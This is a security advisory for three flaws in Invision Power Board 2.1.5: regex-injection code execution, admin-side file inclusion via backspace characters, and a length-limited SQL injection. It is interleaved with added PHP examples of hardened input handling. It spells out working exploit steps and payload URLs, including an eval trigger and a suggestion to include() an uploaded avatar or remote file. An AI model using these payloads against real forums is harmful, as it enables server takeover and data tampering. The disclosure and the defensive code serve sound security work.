SecurityReason.com - Our Reason is Security


Topic: Invision Vulnerabilities, including remote code execution

SecurityAlert: 796
CVE: CVE-2006-2061
CVE: CVE-2006-2060
CVE: CVE-2006-2059
Security Risk: High
Remote Exploit: Yes
Local Exploit: No
Exploit Available: Yes
Credit: IceShaman
Published: 28.04.2006
Affected Software: Invision 2.1.5 and possibly earlier

Advisory Content:

Several Invision Flaws (2.1.5 and possibly earlier)
---------------------------------------------------
IceShaman & Wells
HackThisSite.org

1) Code execution

sources/action_public/search.php line 1261

$this->output = preg_replace(
    "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i",
    "\\1 selected='selected'",
    $this->output );

The input string is not properly sanitized, which can lead to arbitrary code
execution. Example exploit:

- Post in a forum with "eval(die()); //" somewhere in the body of the post.
- Use the search form to find the text "die" just by your username (so only one
  result shows); make sure "Show results as posts" is selected.
- Append &lastdate=z|eval.*?%20//)%23e%00 to the URL at the top and press
  return.
- The code should have been executed.

The lastdate value rewrites the regex so that it matches anything inside
eval() and, because a #e modifier is appended, the matched text is evaluated
as PHP code. The %00 is parsed as a null byte, which truncates the pattern
and discards the original )#i suffix.

Because the replacement text selected='selected' is also evaluated as PHP
code, a space and // have to be used to turn it into a comment so that PHP
ignores it.

As you can see, this is just the beginning. An avatar containing PHP code
somewhere in it can be uploaded and the example above changed to include()
it, running as much PHP code as you like. On default PHP setups include()
also accepts remote files.
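The root cause above is untrusted input spliced into a regular expression pattern, where a null byte and a stray modifier can change what the pattern means. The following is an added example (not Invision's code and not part of the original advisory) of how the same <option>-marking step can be written safely: the lastdate value is validated against a narrow character set (an assumption about legitimate values), escaped with preg_quote() including the delimiter, and the replacement is a plain string with a back-reference rather than anything that is evaluated. The markup, option values and function names are constructed for illustration.

```php
<?php
// Added example, not Invision's code: a hardened rewrite of the search.php
// fragment that marks the requested "lastdate" <option> as selected.
// The markup, option values and function names are constructed.

/**
 * Accept only the characters a lastdate value can legitimately contain
 * (assumed here: letters, digits, underscore; at most 32 bytes). Regex
 * metacharacters and control bytes such as NUL are rejected before they
 * ever reach a pattern.
 */
function validate_lastdate(string $lastdate): ?string
{
    return preg_match('/^[A-Za-z0-9_]{1,32}$/D', $lastdate) === 1 ? $lastdate : null;
}

/**
 * Mark the matching <option> as selected. The value is validated, then
 * escaped with preg_quote() (delimiter included) so it cannot alter the
 * pattern's structure or its modifiers; the replacement is a plain string
 * with a $1 back-reference, so nothing is evaluated.
 */
function mark_selected(string $html, string $lastdate): string
{
    $clean = validate_lastdate($lastdate);
    if ($clean === null) {
        return $html;   // rejected input: markup is returned unchanged
    }
    $pattern = '#(value=["\']' . preg_quote($clean, '#') . '["\'])#i';
    return preg_replace($pattern, '$1 selected=\'selected\'', $html);
}

// Constructed sample markup standing in for the search form's <select>.
$html = "<select name=\"lastdate\">\n"
      . "<option value='day'>Last day</option>\n"
      . "<option value='week'>Last week</option>\n"
      . "</select>";

// Benign value: only the matching option gains selected='selected'.
echo mark_selected($html, 'week'), "\n";

// A value shaped like the advisory's payload (metacharacters, #e, NUL):
// it fails validation and the markup comes back untouched.
$hostile = "z|eval.*? //)#e\0";
var_dump(mark_selected($html, $hostile) === $html);   // bool(true)
```

Two things make this robust rather than merely patched: validation happens before the value is used at all, and the pattern delimiter is passed to preg_quote(), so a '#' in the input is escaped too. Note that the /e modifier itself was deprecated in PHP 5.5 and removed in PHP 7.0, so on a current interpreter preg_replace() refuses it outright; the pattern-injection problem (an attacker reshaping the regex) remains worth fixing independently of that.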

2) Remote file inclusion (requires admin)

sources/action_admin/paysubscriptions.php line 282

$gateway = trim( $this->ipsclass->input['name'] );

The input string is not properly sanitized and can be used to traverse
directories in this later include on line 307:

require_once( ROOT_PATH . 'sources/classes/paymentgateways/class_gw_'.$gateway.'.php' );

This code may look safe because the prefix of the file name is hard-coded;
unfortunately the backspace character can be used to remove that prefix,
allowing ../../ combinations to execute code from any file ending in .php.

Example:
http://host/admin.php?adsess=...&section=content&act=msubs&code=install-gateway&name=%08%08%08%08%08%08%08%08%08/../class_gw_test

The above is a simple PoC which installs the 'test' gateway. %08 is parsed as
the backspace character; nine of them are required to remove 'class_gw_'.

While this is not a serious threat by itself, someone with access to the
system (a shared server, with a /tmp directory?) who happened to gain or
have access to the admin panel would be able to use it to run arbitrary code
on the server in the right circumstances.
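Whatever the exact trick used to strip the prefix, the defensive answer is the same: a user-supplied name must never be allowed to carry path separators, "..", or control bytes into a require_once(), and the final path should be checked for containment after canonicalisation. The following is an added example (not Invision's code and not part of the original advisory) of such a resolver; the directory layout, the sample gateway file name and the function names are constructed, and a temporary directory stands in for sources/classes/paymentgateways/.

```php
<?php
// Added example, not Invision's code: resolving a user-supplied gateway
// name to a file inside the gateway directory, or refusing it.
// Directory, file names and function names are constructed.

/**
 * Resolve a gateway name to a file inside $dir, or return null.
 * Two independent checks: the name must consist only of [a-z0-9_] (so
 * control bytes such as \x08, "..", and "/" never reach the path), and
 * the resolved path must still lie inside the gateway directory after
 * realpath() has canonicalised it.
 */
function gateway_file(string $dir, string $name): ?string
{
    if (preg_match('/^[a-z0-9_]{1,64}$/D', $name) !== 1) {
        return null;            // rejected by the character whitelist
    }
    $base = realpath($dir);
    $file = realpath($dir . '/class_gw_' . $name . '.php');
    if ($base === false || $file === false) {
        return null;            // directory missing or file does not exist
    }
    // Containment check: the canonical file path must start with the
    // canonical directory path followed by a separator.
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $file;
}

// Build a throwaway gateway directory holding one legitimate gateway class.
$dir = sys_get_temp_dir() . '/paymentgateways_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/class_gw_paypal.php', "<?php\n// constructed sample gateway\n");

$tests = [
    'paypal',                                                  // legitimate name
    "\x08\x08\x08\x08\x08\x08\x08\x08\x08/../class_gw_test",   // shape of the advisory's value
    '../../../../etc/passwd',                                  // plain traversal
    "paypal\0",                                                // NUL-terminated name
];
foreach ($tests as $name) {
    $result = gateway_file($dir, $name);
    printf("%-48s => %s\n", addcslashes($name, "\0..\37"), $result ?? 'rejected');
}

// Remove the constructed directory again.
unlink($dir . '/class_gw_paypal.php');
rmdir($dir);
```

Only the first name resolves; the other three are stopped by the whitelist before realpath() is ever called, which also avoids the ValueError that PHP 8 raises for a NUL byte in a filesystem function argument. The containment check is the second layer, covering the case where a future change loosens the whitelist or a symlink appears inside the gateway directory.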

3) SQL Injection (limited use)

sources/lib/func_taskmanager.php line 70

$this->cron_key = substr( trim(stripslashes($_REQUEST['ck'])), 0, 32 );

The input from 'ck' is not sanitized, which could lead to an SQL injection
(limited to 32 characters) on line 113:

'where' => "task_cronkey='".$this->cron_key."'",

Example: http://www.host.com/index.php?act=task&ck='

Although this is limited to 32 characters, it still may pose a risk in
certain circumstances.
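Truncating the key to 32 characters limits the payload length but does nothing about what those characters mean to the SQL parser. The following is an added example (not Invision's code and not part of the original advisory) that puts the vulnerable shape beside a hardened lookup: the key is validated against an assumed 32-character hex format and then bound as a query parameter. It uses an in-memory SQLite database through PDO (requires the pdo_sqlite extension); the table, its rows, the column names and the function names are constructed for illustration.

```php
<?php
// Added example, not Invision's code: the cron-key lookup from
// func_taskmanager.php rewritten with a validated key and a bound
// parameter. Table, rows, column names and key format are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE task_manager (task_id INTEGER PRIMARY KEY, task_title TEXT, task_cronkey TEXT)");
$db->exec("INSERT INTO task_manager VALUES (1, 'prune logs', '0123456789abcdef0123456789abcdef')");

// The vulnerable shape from the advisory: the key is truncated to 32 bytes
// but spliced straight into the SQL text.
function find_task_unsafe(PDO $db, string $ck): array
{
    $key = substr(trim(stripslashes($ck)), 0, 32);
    return $db->query("SELECT task_id, task_title FROM task_manager WHERE task_cronkey='" . $key . "'")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the key is assumed here to be a 32-character lowercase hex
// string, so anything else is rejected up front, and the value travels as
// a bound parameter rather than as part of the SQL text.
function find_task_safe(PDO $db, string $ck): ?array
{
    $key = trim($ck);
    if (preg_match('/^[0-9a-f]{32}$/D', $key) !== 1) {
        return null;                                    // malformed key, no query run
    }
    $stmt = $db->prepare("SELECT task_id, task_title FROM task_manager WHERE task_cronkey = :ck");
    $stmt->execute([':ck' => $key]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$valid  = '0123456789abcdef0123456789abcdef';
$broken = "'";    // the advisory's probe: a lone quote

print_r(find_task_safe($db, $valid));      // the legitimate task row
var_dump(find_task_safe($db, $broken));    // NULL, and no SQL was executed

try {
    find_task_unsafe($db, $broken);
} catch (PDOException $e) {
    // The unbalanced quote breaks the SQL text. Server-side, an error like
    // this in the task-manager path is worth logging and alerting on.
    echo "unsafe query failed: ", $e->getMessage(), "\n";
}
```

The format check does the work that the original substr() only appears to do: a key that is not 32 hex characters never reaches the database, and a key that is cannot contain a quote. Binding the parameter is what removes the injection class entirely, independent of any length limit.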

Flaws researched by IceShaman and Wells.
Flaw #1 was first discovered by the "securicore" security group and used to
exploit my forums. This led to me doing a quick audit of the code to find it
(it goes without saying that I succeeded).

- IceShaman





Feedback: If you have additional information or notice any errors regarding this security advisory, please email us at info()securityreason()com.
Copyright © SecurityReason.com. All Rights Reserved.